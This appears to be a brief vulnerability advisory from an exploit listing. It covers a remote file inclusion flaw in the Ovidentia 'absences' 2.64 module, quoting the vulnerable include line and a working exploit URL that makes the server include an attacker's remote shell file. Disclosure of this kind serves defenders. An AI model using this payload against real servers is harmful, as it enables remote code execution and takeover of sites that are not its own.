Ovidentia absences 2.64 Remote File Inclusion

2015.12.16
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880

Proof-of-Concept: /absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
---------------------------------------------------------------

[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?

Description: The $GLOBALS['babInstallPath'] value isn't initialised before the require_once call, so an attacker who can set it from the request controls the included path and can, for example, have the script execute PHP shellcode.

### The 27-year-old German hacker bd0rk ###

References:

http://cxsecurity.com/issue/WLB-2015120160

